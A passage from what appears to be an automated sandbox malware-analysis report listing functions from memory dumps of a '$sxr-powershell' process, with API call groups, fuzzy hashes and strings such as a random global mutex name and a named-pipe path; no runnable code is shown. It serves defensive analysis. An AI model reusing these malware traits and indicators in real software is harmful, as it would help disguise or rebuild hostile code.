                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 1f36a158701bbfe40222895257e19fca7e1ac23139e400764aef04e4f20ddcd5
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 3E81DF31640E4386FB60AB2698753F967E3EB47780F1484B5ABA5477DADF38C8478700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 190073905-0
                                                                                                            • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction ID: 3d1bbe71671d3319355dd47024fef41ac771f7d71745d618a8852743487ddcfc
                                                                                                            • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                            • Instruction Fuzzy Hash: 34818F31600E4BC9FB90AB6798617FA3693AB85780F184CB59F35877D6DA38C8478710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction ID: 35dfc3aa32dcf8db111c876c6fee45bf4b9fa8742d396846833a13a3022944b0
                                                                                                            • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction Fuzzy Hash: 7A319231212E53E1FF519B12E820BF96296B745BA0F590975EE3D47394EF38C4478300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                            • String ID: CONOUT$
                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                            • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction ID: 432beadd9ff1d5570b399878e757b42c23d043d2f6db8019e472038e20c33c6f
                                                                                                            • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction Fuzzy Hash: D011BF32310F8186E7509B42E864BAA67A1F388FE5F140274EB2EC7794DF38C806C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction ID: c5e34cd1c125c6e3b3952a4bc3e1c7ca60fc8859c728c7a08bed4d9d710644c7
                                                                                                            • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction Fuzzy Hash: 33D19D76218F89C5DB709B1AE4A43AA77A1F788B84F100566EBDD47BA5DF3CC542CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID: $sxr
                                                                                                            • API String ID: 756756679-21942930
                                                                                                            • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction ID: 38f1a088196fad05eee4c8cd52b530c1386e8c9ab981e9f75925f19e634fcf8c
                                                                                                            • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction Fuzzy Hash: 8831B032701F52C2E791EF56E4607B963A2FB44B80F088470DF6843B55EB38C4638700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 517849248-0
                                                                                                            • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction ID: c30b3fdf4ce522d273f9f26ba1b90f5b9a4c16ed02a59b89c02ac7fee96110a0
                                                                                                            • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction Fuzzy Hash: B6016D31700F8296EB50EB12E4687AA63A2F788FD0F585474DFA983754DF3CC9868740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 449555515-0
                                                                                                            • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction ID: b4067fa64353e4a98cf70d8bcfaf437134e86d8ca300ac8ae150644a48af0506
                                                                                                            • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction Fuzzy Hash: DA116D75711F4282FB20AB21E469BBA62A6FB49B81F0804B5CF6947354EF3DC00AC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 2395640692-629598281
                                                                                                            • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction ID: b249911f766401b9d6ad8824cbb6525cc5d7bd24c6b49d6d7660475476209590
                                                                                                            • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction Fuzzy Hash: E6519A32611A03CAEB95DB15E464BB937A6F344B98F5589B4EF2647788DF34D842C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                            • String ID: \\?\
                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                            • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction ID: 47b5d945d2cf1d5e4292b94fd69a8ffd7a6672e9230098f512e373bcd27623f9
                                                                                                            • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction Fuzzy Hash: BCF06872304E42D2E7609B11F8A47EA6762F784B88F849074DB5987564DF3CC68EC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CombinePath
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3422762182-91387939
                                                                                                            • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction ID: 4fab3068c6bb4072b269c040958d05a1e099d3f50f1111dd38f8a9c7c523b273
                                                                                                            • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction Fuzzy Hash: 49F08970304F4291EB505B53F9255BA9256A748FD0F089170DF6647765CE2CC4438304
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction ID: 6723c76907707e339a9684eac4b30a4a56327c1ca06275dfafc04998bf3ee722
                                                                                                            • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction Fuzzy Hash: B8F08271711F42D1EF459B60F4A4BFA2362AB48B90F082479DB2FC6560DF38C48AC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction ID: 744ef6f497fd8405ff9858d340a3b72f33ca1e03ccb8b7fa1144c56ebb9be689
                                                                                                            • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction Fuzzy Hash: 5302FA32219B85C6EBA1CB55F4A07AAB7A1F3C4784F104565EB9E87BA8DF7CC445CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2210144848-0
                                                                                                            • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction ID: 6000016924cf19ea5109459f6aac7719f654d2eac069c0b39c897a396384037b
                                                                                                            • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction Fuzzy Hash: 6981CC32610E1289FB50AB648860BFF67A7F744B98F4646B6DF2A577D2DB348443E310
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction ID: 62fd3c229e29ec2417cbfea20ed0baf9b9a767ef0999405223d770e804cc6077
                                                                                                            • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction Fuzzy Hash: 2561FC32529F85CAE7A19B15E4A07BA77A1F388754F200675EB9D43BA8DB7CC446CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: 88f6a7501effd57d50b0f0fc07d99e030d46684a884c53ee9c67471fc1201102
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: A3115633A54F0341F765126AD4BD3F93143AB55BF4F1847B4AB760AFDE8A2988434200
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: 195c26971b10306001efdd9e2caf3432ea9da77d39e62c8bde7a933e82ba4775
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: A2117333A54E1702F7A81169D47ABFB11C36B64B74F1846B4FB770A7D68B288883C200
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452528299-0
                                                                                                            • Opcode ID: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction ID: ae687ebe9b7db7c57d485a29b9b886607673626e560236d711cb8731276b1cdd
                                                                                                            • Opcode Fuzzy Hash: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction Fuzzy Hash: 93112434601E43C6FF949B269860BF62293A784BB0F284EB4DB39477D5DF28C8438B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092925422-0
                                                                                                            • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction ID: f012099b8acd9de1001e618a508d66905eb48f52fbb4ec8e9c9187f1f084aa86
                                                                                                            • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction Fuzzy Hash: 11116A36604F82C3EB64AB22E4546AAA7B1F745B80F084576DBAC43794EF3DC94AC740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction ID: ce6312046cc802fa1638db7ee19a912dd50a0709fc0cc1da018c36e5fabc8ba0
                                                                                                            • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction Fuzzy Hash: C451AD36612A028AEB54DB15E424BF93796FB42B98F5081B4EB2647788EB74D8429B04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction ID: 293814c8414646a5d1427f1170682cc441ffd9d3b0459a410c71df9ab95c8609
                                                                                                            • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction Fuzzy Hash: D331BF32201F4296E754DF12E868BF937A6FB42BD8F558064AF6607788CB38C942CB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction ID: a9f8a1e91d62cc21e93c12710dde671e8f516a6c52fa450c04c5fb2ac5526037
                                                                                                            • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction Fuzzy Hash: 1371AE32600F82C2E7A49A26D9653FEA796F785BC4F480876DF6943B99DE35C6038740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction ID: 0853425cd067868826294d34b970cc42c260a4f4cdcd95d40282204e5e68a82a
                                                                                                            • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction Fuzzy Hash: 7C51C532204BC3C2EBB59A69A1747FAA793F785780F140976DFA503B99DA35C5028B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: U
                                                                                                            • API String ID: 442123175-4171548499
                                                                                                            • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction ID: 96d810b94d064c87c67fbc3da134fc0c1c4ffc0eb83f397d34c6bf192460272e
                                                                                                            • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction Fuzzy Hash: B441D332714E8592EB209F25E8547EA77A2F388B94F554131EF5E87788DB3CC442DB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001F5FDC72A4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction ID: 25a74541080eafd7a9330cf02dbcd35a84147bb4a6b7d1984ccf588ff375ed7a
